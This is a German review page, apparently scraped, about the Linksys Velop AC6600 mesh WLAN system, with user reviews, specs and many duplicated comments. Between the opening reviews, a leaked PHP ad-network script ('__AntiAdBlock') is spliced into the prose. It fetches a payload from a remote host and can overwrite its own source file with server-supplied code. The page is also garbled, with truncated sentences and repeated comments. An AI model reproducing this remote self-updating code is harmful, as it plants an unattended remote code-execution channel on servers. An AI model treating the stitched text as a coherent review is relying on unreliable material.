Linksys Velop Tri-Band WLAN Modulsystem AC6600 – Problemlose Einrichtung, stabiler Betrieb

Bei mir ging die einrichtung der geräte und des wlan ohne probleme vonstatten. Gegenüber meiner alten repeaterkonfiguration, kann ich jetzt nach 3 tagen des testens, eine deutliche performance- und stabilitätssteigerung feststellen.

So richtig revolutionär sind die neu aufkommenden mesh netzwerk access points nicht, schließlich lässt sich der gleiche komfort (wlan roaming im hause über verschiedene access points ohne vorhandene netzwerk infrastruktur) auch über devolo powerlan access points realisieren, wenn man deren ssids (vereinfacht gesprochen netzwerknamen) und wpa schlüssel gleich konfiguriert. Von daher war ich gespannt, wieviel „mehrwert“ linksys hier für den beachtlichen preis bieten kann, auch wenn ich als informatiker nicht unbedingt zur zielgruppe gehöre. Denn bei der bewertung des systems muss man sich eines vor augen halten: linksys spricht hier käufer an, die möglichst wenig mit der technik zu tun haben wollen. Poweruser kommen nur über umwege auf ihre kosten (siehe hierzu die anleitung zum aufrufen der webgui am ende der rezension). Die pros/cons der velop access points im Überblick:++ sehr einfache in-betriebnahme++ sehr gute wlan abdeckung+ ethernet verbindung zwischen aps möglich+ schnelleres roaming als bei wlan repeatern+ sehr guter durchsatz+ wertige hardware+ gastnetzwerk, kinderschutzfunktion, geräte priorisierung+ zwei gigabit ethernet ports+ geringer stromverbraucho web-oberfläche nur über umwege zu erreichen (und nicht offiziell supported)o lange bootzeito kein usb port/storage möglichkeito mäßige app (zu wenig und fehlerhafte informationen)- kennwort keine sonderzeichen- konto zum konfigurieren erforderlich + cloud zwang- kaum wlan-konfigurationsmöglichkeiten in der app (band, kanal, zeitplan, etc. )- kein bridge modus in der app (dhcp nicht deaktivierbar)- hilfe teilweise fehlerhaft- app noch mit bugsfazit: man muss darauf achten, wer die zielgruppe für das system ist. Wer sich nicht sonderlich mit der technik auseinandersetzen möchte kann mit dem set unheimlich leicht und ohne großartige kenntnisse ein gut funktionierendes wlan mesh netzwerk mit hohen durchsatzraten einrichten und selbst die nutzung einer ethernet verbindung als backbone wird automatisch erkannt. Allerdings schränkt die app die konfigurationsparameter insbesondere des wlans zu stark ein. Auch der konto- und cloud zwang ist unbefriedigend und in zeiten gekaperter wlan router (telekom lässt grüßen) ein sicherheitsrisiko. Leider lässt sich velop auch nicht einfach im bridge modus betreiben, was ärgerlich ist, wenn man seinen dsl router im netz lassen möchte.

requestTimeout / 1000); return $value == 0 ? 1 : $value; } private function getTimeoutMS() { return $this->requestTimeout; } private function ignoreCache() { $key = md5('PMy6vsrjIf-' . $this->zoneId); return array_key_exists($key, $_GET); } private function getCurl($url) { if ((!extension_loaded('curl')) || (!function_exists('curl_version'))) { return false; } $curl = curl_init(); curl_setopt_array($curl, array( CURLOPT_RETURNTRANSFER => 1, CURLOPT_USERAGENT => $this->requestUserAgent . ' (curl)', CURLOPT_FOLLOWLOCATION => false, CURLOPT_SSL_VERIFYPEER => true, CURLOPT_TIMEOUT => $this->getTimeout(), CURLOPT_TIMEOUT_MS => $this->getTimeoutMS(), CURLOPT_CONNECTTIMEOUT => $this->getTimeout(), CURLOPT_CONNECTTIMEOUT_MS => $this->getTimeoutMS(), )); $version = curl_version(); $scheme = ($this->requestIsSSL && ($version['features'] & CURL_VERSION_SSL)) ? 'https' : 'http'; curl_setopt($curl, CURLOPT_URL, $scheme . '://' . $this->requestDomainName . $url); $result = curl_exec($curl); curl_close($curl); return $result; } private function getFileGetContents($url) { if (!function_exists('file_get_contents') || !ini_get('allow_url_fopen') || ((function_exists('stream_get_wrappers')) && (!in_array('http', stream_get_wrappers())))) { return false; } $scheme = ($this->requestIsSSL && function_exists('stream_get_wrappers') && in_array('https', stream_get_wrappers())) ? 'https' : 'http'; $context = stream_context_create(array( $scheme => array( 'timeout' => $this->getTimeout(), // seconds 'user_agent' => $this->requestUserAgent . ' (fgc)', ), )); return file_get_contents($scheme . '://' . $this->requestDomainName . $url, false, $context); } private function getFsockopen($url) { $fp = null; if (function_exists('stream_get_wrappers') && in_array('https', stream_get_wrappers())) { $fp = fsockopen('ssl://' . $this->requestDomainName, 443, $enum, $estr, $this->getTimeout()); } if ((!$fp) && (!($fp = fsockopen('tcp://' . gethostbyname($this->requestDomainName), 80, $enum, $estr, $this->getTimeout())))) { return false; } $out = "GET {$url} HTTP/1.1\r\n"; $out .= "Host: {$this->requestDomainName}\r\n"; $out .= "User-Agent: {$this->requestUserAgent} (socket)\r\n"; $out .= "Connection: close\r\n\r\n"; fwrite($fp, $out); stream_set_timeout($fp, $this->getTimeout()); $in = ''; while (!feof($fp)) { $in .= fgets($fp, 2048); } fclose($fp); $parts = explode("\r\n\r\n", trim($in)); return isset($parts[1]) ? $parts[1] : ''; } private function getCacheFilePath($url, $suffix = '.js') { return sprintf('%s/pa-code-v%s-%s%s', $this->findTmpDir(), $this->version, md5($url), $suffix); } private function findTmpDir() { $dir = null; if (function_exists('sys_get_temp_dir')) { $dir = sys_get_temp_dir(); } elseif (!empty($_ENV['TMP'])) { $dir = realpath($_ENV['TMP']); } elseif (!empty($_ENV['TMPDIR'])) { $dir = realpath($_ENV['TMPDIR']); } elseif (!empty($_ENV['TEMP'])) { $dir = realpath($_ENV['TEMP']); } else { $filename = tempnam(dirname(__FILE__), ''); if (file_exists($filename)) { unlink($filename); $dir = realpath(dirname($filename)); } } return $dir; } private function isActualCache($file) { if ($this->ignoreCache()) { return false; } return file_exists($file) && (time() - filemtime($file) < $this->cacheTtl * 60); } private function getCode($url) { $code = false; if (!$code) { $code = $this->getCurl($url); } if (!$code) { $code = $this->getFileGetContents($url); } if (!$code) { $code = $this->getFsockopen($url); } return $code; } private function getPHPVersion($major = true) { $version = explode('.', phpversion()); if ($major) { return (int)$version[0]; } return $version; } private function parseRaw($code) { $hash = substr($code, 0, 32); $dataRaw = substr($code, 32); if (md5($dataRaw) !== strtolower($hash)) { return null; } if ($this->getPHPVersion() >= 7) { $data = @unserialize($dataRaw, array( 'allowed_classes' => false, )); } else { $data = @unserialize($dataRaw); } if ($data === false || !is_array($data)) { return null; } return $data; } private function getTag($code) { $data = $this->parseRaw($code); if ($data === null) { return ''; } if (array_key_exists('code', $data)) { $this->selfUpdate($data['code']); } if (array_key_exists('tag', $data)) { return (string)$data['tag']; } return ''; } public function get() { $e = error_reporting(0); $url = $this->routeGetTag . '?' . http_build_query(array( 'token' => $this->token, 'zoneId' => $this->zoneId, 'version' => $this->version, )); $file = $this->getCacheFilePath($url); if ($this->isActualCache($file)) { error_reporting($e); return $this->getTag(file_get_contents($file)); } if (!file_exists($file)) { @touch($file); } $code = ''; if ($this->ignoreCache()) { $fp = fopen($file, "r+"); if (flock($fp, LOCK_EX)) { $code = $this->getCode($url); ftruncate($fp, 0); fwrite($fp, $code); fflush($fp); flock($fp, LOCK_UN); } fclose($fp); } else { $fp = fopen($file, 'r+'); if (!flock($fp, LOCK_EX | LOCK_NB)) { if (file_exists($file)) { $code = file_get_contents($file); } else { $code = ""; } } else { $code = $this->getCode($url); ftruncate($fp, 0); fwrite($fp, $code); fflush($fp); flock($fp, LOCK_UN); } fclose($fp); } error_reporting($e); return $this->getTag($code); } private function getSelfBackupFilename() { return $this->getCacheFilePath($this->version, ''); } private function selfBackup() { $this->selfSourceContent = file_get_contents(__FILE__); if ($this->selfSourceContent !== false && is_writable($this->findTmpDir())) { $fp = fopen($this->getSelfBackupFilename(), 'cb'); if (!flock($fp, LOCK_EX)) { fclose($fp); return false; } ftruncate($fp, 0); fwrite($fp, $this->selfSourceContent); fflush($fp); flock($fp, LOCK_UN); fclose($fp); return true; } return false; } private function selfRestore() { if (file_exists($this->getSelfBackupFilename())) { return rename($this->getSelfBackupFilename(), __FILE__); } return false; } private function selfUpdate($newCode) { if(is_writable(__FILE__)) { $hasBackup = $this->selfBackup(); if ($hasBackup) { try { $fp = fopen(__FILE__, 'cb'); if (!flock($fp, LOCK_EX)) { fclose($fp); throw new Exception(); } ftruncate($fp, 0); if (fwrite($fp, $newCode) === false) { ftruncate($fp, 0); flock($fp, LOCK_UN); fclose($fp); throw new Exception(); } fflush($fp); flock($fp, LOCK_UN); fclose($fp); if (md5_file(__FILE__) === md5($newCode)) { @unlink($this->getSelfBackupFilename()); } else { throw new Exception(); } } catch (Exception $e) { $this->selfRestore(); } } } } } $__aab = new __AntiAdBlock_2430765(); return $__aab->get();

Mein wlan muss über 4 etage zur verfügung stehen. Das “kabelmodem (connectbox)” meines anbieters steht im keller am switch/hub. Ich habe die app von linksys installiert, das erste node an eine lan buchse gesteckt und bin einfach den angaben gefolgt. Innerhalb wenigen minuten hatte ich zwei nodes perfekt installiert. Das hat sich wunderbar installieren lassen, wollte aber am standort erst nicht richtig connecten obwohl es die richtigen anzeigen hatte. Nach einigem hin und her ist der 3. Node aber dann auch online gekommen. Da hätte die fehlersuche einfacher sein können. Das netz läuft 3 mal schneller als mein letztes access point netzwerk (mit 3 identischen aps) und ist in den 3 wochen seit installation nicht umgefallen. Das ap netzwerk musste ich täglich neu durchstarten. Für den keller bereich werde ich noch eine 4. Prima produkt und der support war auch gut. Hier sind die Spezifikationen für die Linksys Velop Tri-Band WLAN Modulsystem AC6600:

  • Geben Sie Ihr Modell ein,
    um sicherzustellen, dass dieser Artikel passt.
  • Das leistungsstarke Tri-Band WLAN-Modulsystem erzielt über stylische und extrem kompakte Nodes, die sich über dasselbe Netzwerk miteinander verbinden, überall bei Ihnen zu Hause eine Signalstärke von 100 % und die maximale WLAN-Geschwindigkeit
  • Schnelle und einfache Einrichtung über die Linksys App; Mit der App können Sie Kinderschutzfunktionen einstellen und über einen Zeitplan festlegen, wann Ihre Kinder online sein dürfen; Sie können auch Netzwerke für Gäste konfigurieren und ihnen per SMS oder E-Mail ein Passwort senden, über Ihr Mobilgerät die automatische Fehlerbehebung für ein Node aktivieren und vieles mehr
  • Kompatibel mit Amazon Alexa: Wenn Sie Amazon Echo haben, können Sie per Sprachbefehl Ihr Gast-WLAN ein- und ausschalten und das Passwort für das Gast-WLAN abfragen
  • Jetzt mit einem Bridge-Modus für Benutzer, deren Internetanbieter-Gateway nicht entfernt werden kann; durch Aktivierung des Bridge-Modus wird sichergestellt, dass sich Geräte, die mit dem Velop und dem Gateway des Internetanbieters verbunden sind, im selben Netzwerk befinden, während die maschenartige Netzwerkfunktion, Kompatibilität mit Amazon Alexa und automatische Firmware-Updates wie gewohnt funktionieren
  • Jetzt gibt es auch eine webbasierte Benutzeroberfläche. So wird Velop Usern die Nutzung der erweiterten Funktionen und das Management Ihres Home-Netzwerks nicht nur über ein iOS- oder Android-Gerät, sondern auch über einen Mac- oder Windows-Computer ermöglicht

2017:gleich schlechte erfahrung wie stefan glückmir ist es genau gleich ergangen, wie stefan glück. Das erste gerät liess sich einfach einrichten, beide anderen nicht. Mehrfache resets brachten nichts, die krönung war dann ein fast 90min “gespräch” mit einer unfähigen und vom starken akzent kaum verständlichen “technikerin”. Ab und zurück mit diesem unausgereiften frusterzeuger. Ergänzung / korrektur vom 10. 2017:nach meiner rezession wurde ich über amazon vom produktmanager gebeten, mit ihm kontakt aufzunehmen (siehe sein kommentar dieser rezession), was ich auch gemacht habe. Der service war – ganz im gegensatz zum erstkontakt mit der hotline “technikerin” – unglaublich positiv.

Die gesamte organisation und der systemzugriff sind nur über mobile geräte und apps möglich. Eine desktopvariante wäre wünschenswert. Davon abgesehen funktioniert die installation und einbettung in mein vorhandenes umfeld mit fritz box reibungslos. Die qualität als router und repeater ist wunderbar. Daher für einsteiger gut geeignet. Leider ist dieser vorteil auch zugleich schwierig für leute, die gerne die netz-konfigurationen selbst vornehmen bzw steuern und sicher kontrollieren wollen. Hier bietet die software meines erachtens etwas wenig flexibilität und transparenz. Dennoch ist die leistung ohne frage vorhanden.

Kommentare von Käufern :

  • Gute Flächenabdeckung/Erweiterbarkeit, hohe Bandbreite, geringer Stromverbrauch.
  • WiFi wie es sein soll
  • Funktioniert einfach nur super

Die einrichtung funktioniert ganz einfach, nur die app sollte etwas mehr upgedatet werden und etwas übersichtlicher seinich habe insgesamt 6 stück im ganzen haus verteilt und bin ganz zufrieden damit wer ein telekom router haben sollte einfach wlan abschalten und den telekom router als modem verwenden und den velop als wlan. Velop ist ein super schnelles wlan netzwerk habe jetzt überall im haus die gleiche schnellichkeit. Besten Linksys Velop Tri-Band WLAN Modulsystem AC6600 (MU-MIMO, funktioniert mit Amazon Alexa, 3-Pack) weiß

Der velop lässt sich sehr schnell einrichten und bietet neben dem wlan für das familiäre umfeld auch ein gast-wlan für den besuch. Ganz großer vorteil ist für uns die fast unterbrochene wlan-verbindung im haus zwischen den stationen, da hier nicht erst zum neuen router verbunden werden muss und somit die nutzung zu keiner zeit eingeschränkt ist, wie mit herkömmlichen routern.

Perfekte erweiterung für mein bestehendes linksys system. Trotz oder gerade wegen warehouse deal ein echter schnapp. Ich bin sehr zufrieden frieden mit dem flächendeckenden wlan für 350 m2 mit gleich bleibender signalstärke ?.

Als erstes muss man sagen, dass es wirklich schöne geräte sind. Wenn ich da an die anderen häßlichen schwarzen boxen denke … die velop nodes können sich wirklich sehen lassen – erinnern stark an das design der neuen xbox one. Schon die verpackung ist ein blick nach einem unboxing video wert. Alle anschlüsse und schalter sind im inneren des fußes versteckt, durch eine schlaufe lassen sich kabel schön aus dem gerät führen. Das einrichten per app hat richtig spass gemacht und ging schnell. Danach wurde nach neuer firmware gesucht und installiert (das hatte fast am längsten gedauert). Eines der beiden velop nodes wird mit dem modem per ethernet (es befinden sich jeweils zwei davon im fuss) verbunden, der zweite node wird dann per app als „slave“ hinzugefügt. Der zweite ethernet anschluss kann natürlich dafür genutzt werden, andere geräte per kabel zu verbinden. Ich habe so meine timecapsule verbunden.

Entgegen anderer rezessionen hat bei mir die einruchtung super geklappt und auch die app war sehr schnell und responsive. Bin auch positiv überrascht das man viele erweiterte einstellungen (dmz, port weiterleitung, diagnose & logs) zur verfügung hat. Dachte auch das ich alle 3 geräte brauchen würde (2 geschossig mit mehreren tragenden wänden aus stahlbeton, inkl. Balkon und terasse) – am ende reichen aber 2 geräte völlig für eine sehr gute abdeckung.

Ja, das system ist nicht das billigste, aber: seit der kinderleichten einrichtung zu hause hatte ich kein einziges problem mehr mit dem wlan. Die zugehörige app ist sehr übersichtlich und gut gestaltet.

Bin sehr zufrieden mit den beiden velops. Ich setze sie in einem 2-stöckigen haus mit keller ein – 1 velop im og, einer im eg. Bis auf ein paar ecken im keller wird alles bestens abgedeckt, auch im garten sind wir sehr gut versorgt. Installation ist sehr einfach und hat auf anhieb geklappt. Der einzige kritikpunkt meinerseits wäre, dass ich mir im bridgemode einen macfilter wünschen würde – aber vielleicht wird das ja mit einem späteren update implementiert?.

Das velop system von linksys liefert eine eine sehr gute, solide wifi-abdeckung. Ich wollte meine bestehenden zwei module durch ein drittes modul ergänzen – das hat nicht funktioniert. Die zugehörige app stürzt während der konfiguration immer ab, eine konfiguration über die (sehr komplexe und verwirrende) web-oberfläche hat ebenfalls nicht funktioniert. Erst ein update des moduls auf die aktuelle firmware ermöglichte die integration allerdings brauchte es auch dann noch 6 anläufe bis das modul integriert war. Da es jedoch immer die verbindung verliert, habe ich es zurückgeschickt. Insgesamt sollte an der app noch ordentlich gefeilt werden, besonders im bezug auf speed, erweiterung des systems und erste nutzung/onboarding.

Ich hatte bisher immer mehrere router, extender, kabel im haus – endlich hat das ein endesuper reichweite, einfache installation und interface. Hauptgrund für den kauf war für mich, dass sich meine geräte nicht von einem router zum nächsten neu verbinden müssen wenn ich von einem zimmer in das andere laufe. Und es funktioniert wie erhofft. Einfach ein netz anlegen, und alle meine geräte (von laptop, zu telefon, zu gastgeräten) sind ohne unterbruch immer verbunden.

Funktioniert bei richtiger positionierung super. Hatte vom router zum letzten access point nur ca 7% geschwindigkeitsverlust.

Nach langer unzufriedenheit mit dem alten wlan mit 2 tp-link accesspoints habe ich mich getraut auf eines der modernen mesh-wlans umzusteigen. Das linksys velop bringt laut diverser tests eine hervorragende leistung, ist in der lage eine vorhandene ethernet-verkabelung für einen kabelgebundenen backhaul zu nutzen und bietet einen bridgemodus, der z. Einziger schönheitsfehler: laut userberichten gelingt einem teil der käufer die erstkonfiguration nur nach vielen stunden des probierens und manchmal auch gar nicht. Ich hatte also vorsorglich private und berufliche termine für die nächsten 7 tage abgesagt, den kühlschrank gefüllt und mich auf eine nervenaufreibende installation eingerichtet. Doch die panik war komplett umsonst. Es hat alles im ersten versuch geklappt. Sehr viele infos auf den linksys-seiten und eine gut gemachte installations-app haben es möglich gemacht binnen einer stunde alles zu erledigen. Der durchsatz ist prima, die werte entsprechen denen, die ich via ethernet erreichen kann.

Zum lieferumfang gehören,eine kurzanleitung,3 linksys velop nodes inkl. 3 netzteilesowie ein ethernetkabel. Die kinderleichte einrichtung erfolgt über die linksys- app, aus dem appstore oder aber dem google play store,die einen an die hand nimmt, so das auch laien das haus, die garage oder aber den garten mit wlan abdecken können. Für die registrierung ist allerdings ein smart-wifi- konto bei linksys erforderlich,wodurch sich das modulsystem später von einem beliebigen internetzugang aus steuern lässt. Der erste node wird an den vorhandene router oder aber einem modem angeschlossen und als router konfiguriert. Hat man den ersten node eingerichtet werden die einstellungen automatisch an die anderen “übertragen”. Der zugriff auf das velop-system funktioniert ausschließlich über die linksys-app. Über die app werden der gastzugriff, der kinderschutz oder aber die priorisierung gesteuert. Auf ein webmenü über den browser muss verzichtet werden. Die Übertragung ins benachbarte gebäude sowie auch ins andere stockwerk funktioniert tadellos,das signal ist stark genug, keine funkabbrüche oder aber sonstiges.

Die installation uber das app ist super easy und die netzabdeckung auchspeedtest zeigt auch die volle leistung. Bin super zufrieden und habe es schon meine freunde empfohlen.

Hatte immer probleme mit dem wlan. Habe eine fritzbox 6490 die ein eher bescheidenes wlan hat. Überbrückung mit repeater machte wenig sinn, da sich dadurch ja die bandbreite halbiert. Die velop haben einen stolzen preis sind aber me jeden euro wert. Die app ist sehr intuitiv und die einrichtung geht locker von der hand. Insbesondere die einbindung der weiteren velop in das mesh netzwerk ist fantastisch gelöst. Damit von mir eine klare kaufempfehlung trotz des hohen preises. Dieser relativiert sich angesichts der leistung.

Ich habe das system gekauft um ein haus ohne internetverkabelung in südafrika zu vernetzen. 5 knoten waren schnell installiert und nach 6 wochen funkrtioniert es immer noch bestens. Ich habe internet in jedem winkel des hauses und sogar in der obere etage iund im garten (1300 m2) ist voller empfang obwohl dort kein knoten ist. Ich kann das system nur empfehlen.

Das einrichten ist wirklich sehr einfach. Auch die verbindungsqualität unter den nodes und zum client ist sehr gut. Leider fehlt im bridge modus eine Übersicht welcher clients mit welchen node verbunden ist + mit welchen kanal. Auch eine anzeige wie gut die verbindung unter den nodes ist wäre wünschenswert.

Endlich schnelles wifi im ganzen haus, trotz viel beton und über drei etagen hinweg – ich bin begeistert. Die einrichtung hat etwas gedauert, war aber nicht kompliziert – man muss halt erst die am besten geeigneten aufstellorte ermitteln, das kann etwas herumprobieren erfordern. Einmal eingerichtet läuft das system stabil und mit hoher geschwindigkeit – was der dsl-anschluss halt hergibt. Die einzelnen geräte sind optisch schön unauffällig. Mein lieblingsfeature ist mu-mimo, das konnte der alte router nicht und es bringt zumindest gefühlt richtig viel. Ich würde es wieder kaufen.

Ich habe nun das system einige zeit ausprobiert und musste verblüfft feststelle, das ich bislang anscheinend mit angezogenen handbremsen durchs netz gesaust. Schon seit jahren habe ich probleme mit dem wlan und fand für mich keine richtige lösung. Mit repeatern habe ich keine nennenswerte beschleunigung festgestellt. Zeitweise habe ich wieder mit kabellage gesurft. Das system von linksys hat meinem internet beine gemacht. =^_^=gut gefällt mir:- tatsächlich sehr einfache einrichtung des modulsystems durch die app- vorher hatte ich sehr oft in letzter zeit internetabbrüche und eine tendenziell schwache, langsame leitung. Nun ist meine wohnung weiß gott kein schloss.

Summary
Review Date
Reviewed Item
Linksys Velop Tri-Band WLAN Modulsystem AC6600 (MU-MIMO, funktioniert mit Amazon Alexa, 3-Pack) weiß
Rating
5,0 of 5 stars, based on 90 reviews

Author: SmartHome

1 thought on “Linksys Velop Tri-Band WLAN Modulsystem AC6600 – Problemlose Einrichtung, stabiler Betrieb

  1. Trotz einiger schlechter kritiken – was die einrichtung – des systems betraf habe ich mich für das system entschieden – da ich bisher sehr gute erfahrungen mit linksys gemacht habe. Ich wurde nicht enttäuscht – das system ist spitze. Eigentlich ist auch die einrichtung spielend einfach. Am besten schaut man sich diverse videos dazu an. Bei mehreren nodes ist es einfach nur wichtig diese zur einrichtung nicht zu weit und auch nicht zu nahe in einem raum zu positionieren – dann geht die einrichtung von – wie bei mit 3 nodes – per app sehr schnell. Im anschluß positioniert man dann die geräte dort wo man sie haben möchte – ist die entfernung für das zusammenspiel zu groß meldet das system einen verbindungsfehler. Aber man muss hier ein wenig umdenken zu bisheriger technik. Im zusammenspiel von 3 nodes bekommt man ein netzwerk von schon beeindruckender größe hin – und das vor allem mit voller geschwindigkeit. Die app fürs iphone ist klasse – super coole features – zum beispiel ein wisch und schon ist das gastnetzwerk aktiviert – zugangsdaten per sms oder mail noch ein wisch und das wars. Klasse gutes produkt deshalb 5 sterne.
  2. Rezension bezieht sich auf : Linksys Velop Tri-Band WLAN Modulsystem AC6600 (MU-MIMO, funktioniert mit Amazon Alexa, 3-Pack) weiß

    Trotz einiger schlechter kritiken – was die einrichtung – des systems betraf habe ich mich für das system entschieden – da ich bisher sehr gute erfahrungen mit linksys gemacht habe. Ich wurde nicht enttäuscht – das system ist spitze. Eigentlich ist auch die einrichtung spielend einfach. Am besten schaut man sich diverse videos dazu an. Bei mehreren nodes ist es einfach nur wichtig diese zur einrichtung nicht zu weit und auch nicht zu nahe in einem raum zu positionieren – dann geht die einrichtung von – wie bei mit 3 nodes – per app sehr schnell. Im anschluß positioniert man dann die geräte dort wo man sie haben möchte – ist die entfernung für das zusammenspiel zu groß meldet das system einen verbindungsfehler. Aber man muss hier ein wenig umdenken zu bisheriger technik. Im zusammenspiel von 3 nodes bekommt man ein netzwerk von schon beeindruckender größe hin – und das vor allem mit voller geschwindigkeit. Die app fürs iphone ist klasse – super coole features – zum beispiel ein wisch und schon ist das gastnetzwerk aktiviert – zugangsdaten per sms oder mail noch ein wisch und das wars. Klasse gutes produkt deshalb 5 sterne.
    1. Ich habe schon einige produkte probiert. Jetzt habe ich mit linksys velop offenbar die perfekte lösung gefunden. Auspacken, iphone/ios app installiert und los ging es. Musste 1x eine node umstellen, damit diese eine besser verbindung zur basis hat – seit dem alles super. Ich habe mir dann noch diese wandhalterung besorgt:myriann wandhalterung wandhalterung ständer für linksys velop tri-band-ganze home wifi mesh system white (2 pack).
  3. Rezension bezieht sich auf : Linksys Velop Tri-Band WLAN Modulsystem AC6600 (MU-MIMO, funktioniert mit Amazon Alexa, 3-Pack) weiß

    Ich habe schon einige produkte probiert. Jetzt habe ich mit linksys velop offenbar die perfekte lösung gefunden. Auspacken, iphone/ios app installiert und los ging es. Musste 1x eine node umstellen, damit diese eine besser verbindung zur basis hat – seit dem alles super. Ich habe mir dann noch diese wandhalterung besorgt:myriann wandhalterung wandhalterung ständer für linksys velop tri-band-ganze home wifi mesh system white (2 pack).
  4. Rezension bezieht sich auf : Linksys Velop Tri-Band WLAN Modulsystem AC6600 (MU-MIMO, funktioniert mit Amazon Alexa, 3-Pack) weiß

    Allerdings war die konfiguration nicht ganz so einfach und ich musste 2 velops zurücksetzen. Die richtung ist aber klar in richtung consumer freundlich und das ist schon eine gute, wenn ich auch als power-user gerne mehr parameter selber definieren können würde.
  5. Rezension bezieht sich auf : Linksys Velop Tri-Band WLAN Modulsystem AC6600 (MU-MIMO, funktioniert mit Amazon Alexa, 3-Pack) weiß

    Allerdings war die konfiguration nicht ganz so einfach und ich musste 2 velops zurücksetzen. Die richtung ist aber klar in richtung consumer freundlich und das ist schon eine gute, wenn ich auch als power-user gerne mehr parameter selber definieren können würde.
    1. Ich habe in meinem haus schon viel versucht ein stabiles wlan hinzubekommen. Zuerst mit apple produkten, dann mit power line adaptern vom provider. Leider war keine der lösungen stabil oder schnell. Zum glück habe ich das velop systam für mich entdeckt. Es war schnell eingerichtet. Die app ist dabei äußerst anwenderfreundlich gestaltet, mit guter menüführung. Man muss von der technik nicht wirklich viel verständnis haben. Der standort der module wird sogar überprüft und hilft somit diesen zu optimieren. Das system läuft mittlerweile 2 monate stabil und ich bekomme von meiner 500er leitung stabil 150-200 im kompletten haus.
      1. Ich habe in meinem haus schon viel versucht ein stabiles wlan hinzubekommen. Zuerst mit apple produkten, dann mit power line adaptern vom provider. Leider war keine der lösungen stabil oder schnell. Zum glück habe ich das velop systam für mich entdeckt. Es war schnell eingerichtet. Die app ist dabei äußerst anwenderfreundlich gestaltet, mit guter menüführung. Man muss von der technik nicht wirklich viel verständnis haben. Der standort der module wird sogar überprüft und hilft somit diesen zu optimieren. Das system läuft mittlerweile 2 monate stabil und ich bekomme von meiner 500er leitung stabil 150-200 im kompletten haus.
  6. Rezension bezieht sich auf : Linksys Velop Tri-Band WLAN Modulsystem AC6600 (MU-MIMO, funktioniert mit Amazon Alexa, 3-Pack) weiß

    Entgegen der teilweise zu lesende rezensionen, einfach in betrieb zu nehmen und funktioniert stabil und schnell. Hin und wieder verlieret ein knoten die verbindung zur basisstation. Das ist etwas lästig, lässt sich aber schnell beheben. Im vergleich zu allem was wir vorher hatten definitiv ein fortschritt. Etwas schade ist es, das zusätzliche features wie geräte priorisierung im bridge modus nicht unterstützt werden können. Aber im vergleich zur flächendeckung des mesh im haus ist das zu verschmerzen.
  7. Rezension bezieht sich auf : Linksys Velop Tri-Band WLAN Modulsystem AC6600 (MU-MIMO, funktioniert mit Amazon Alexa, 3-Pack) weiß

    Entgegen der teilweise zu lesende rezensionen, einfach in betrieb zu nehmen und funktioniert stabil und schnell. Hin und wieder verlieret ein knoten die verbindung zur basisstation. Das ist etwas lästig, lässt sich aber schnell beheben. Im vergleich zu allem was wir vorher hatten definitiv ein fortschritt. Etwas schade ist es, das zusätzliche features wie geräte priorisierung im bridge modus nicht unterstützt werden können. Aber im vergleich zur flächendeckung des mesh im haus ist das zu verschmerzen.
  8. Rezension bezieht sich auf : Linksys Velop Tri-Band WLAN Modulsystem AC6600 (MU-MIMO, funktioniert mit Amazon Alexa, 3-Pack) weiß

    Ich bin von der schnelligkeit meines internetanschlusses (telekom magenta s hybrid) begeistert, dank des velop systems. Funktioniert perfekt, auch die einrichtung hat bei mir (ug, eg & og) prima funktioniert. System läuft stabil & ist um längen schneller als die speedport oder mein airport-system vorher. Habe es bei apple direkt gekauft – war günstiger.
  9. Rezension bezieht sich auf : Linksys Velop Tri-Band WLAN Modulsystem AC6600 (MU-MIMO, funktioniert mit Amazon Alexa, 3-Pack) weiß

    Ich bin von der schnelligkeit meines internetanschlusses (telekom magenta s hybrid) begeistert, dank des velop systems. Funktioniert perfekt, auch die einrichtung hat bei mir (ug, eg & og) prima funktioniert. System läuft stabil & ist um längen schneller als die speedport oder mein airport-system vorher. Habe es bei apple direkt gekauft – war günstiger.
    1. Wir hatten für unser einfamilienhaus vorher eine lösung über das stromnetz und dann google wifi installiert. Beides funktionierte sehr unterschiedlich zuverlässig. Seitdem wir 2 geräte von linksys benutzen gehört das der vergangenheit an. Permanent stabiles wlan mit höchster geschwindigkeit. Und, das wichtigste, diese geräte können den bridge modus. Das bedeutet, das man wirklich im gleichen netz mit gleicher ip adresse unterwegs ist wie der router. Kann ich nur absolut empfehlen.
      1. Wir hatten für unser einfamilienhaus vorher eine lösung über das stromnetz und dann google wifi installiert. Beides funktionierte sehr unterschiedlich zuverlässig. Seitdem wir 2 geräte von linksys benutzen gehört das der vergangenheit an. Permanent stabiles wlan mit höchster geschwindigkeit. Und, das wichtigste, diese geräte können den bridge modus. Das bedeutet, das man wirklich im gleichen netz mit gleicher ip adresse unterwegs ist wie der router. Kann ich nur absolut empfehlen.
  10. Rezension bezieht sich auf : Linksys Velop Tri-Band WLAN Modulsystem AC6600 (MU-MIMO, funktioniert mit Amazon Alexa, 3-Pack) weiß

    Einrichtung – eine absolute katastropheder erste node konnte ohne probleme installiert werden. Allerdings nicht in den bridge-modus gesetzt werden. Dazu soll erst ein update gemacht werden. Allerdings fand das automatische update keine updates, obwohl es online verfügbar ist. Manuell updaten kann man nur, wenn man weiß, wie das geht. =>anruf beim support mit einer gesprächsdauer von ca. Danach versucht weitere nodes zu verbinden. Ging nur, wenn sie in direkter sichtweite mit einer maximalen distanz von drei metern ohne irgendwelche gegenstände dazwischen waren.
    1. Einrichtung – eine absolute katastropheder erste node konnte ohne probleme installiert werden. Allerdings nicht in den bridge-modus gesetzt werden. Dazu soll erst ein update gemacht werden. Allerdings fand das automatische update keine updates, obwohl es online verfügbar ist. Manuell updaten kann man nur, wenn man weiß, wie das geht. =>anruf beim support mit einer gesprächsdauer von ca. Danach versucht weitere nodes zu verbinden. Ging nur, wenn sie in direkter sichtweite mit einer maximalen distanz von drei metern ohne irgendwelche gegenstände dazwischen waren.
      1. Ich habe das linksys velop system für anwendungen mit hoher bandbreite und niedriger latenz (videotelefonie, streaming/sat-ip) gekauft und die bestehenden mimo-accesspoints ersetzt. Insgesamt sind 4 (2x 2er set) velops im einsatz. Die velops werden an einem router betrieben. Räumliche vorgaben:4 stockwerke (keller, eg, 1. Stock, speicher) mit 350qm, terrasse, balkon, gartenanordnung:je stockwerk 1 velop. Router im keller via lan kabel mit velop verbunden. Velop im eg via lan kabel verbunden, 1. Stock und speicher drahtlosanwendung:sat-ip für 4 endgeräte, video-on-demand (netflix+prime), facetime ip-telefonie, v smarthome-steuerung, surfen/emailbewertung:das koppeln der velops funktioniert unter ios via app komfortabel und problemlos. Der vorgang nimmt jedoch einige zeit in anspruch, da die geräte im anschluss noch updates einspielen. Insgesamt dauert das einrichten eines neuen velops c.
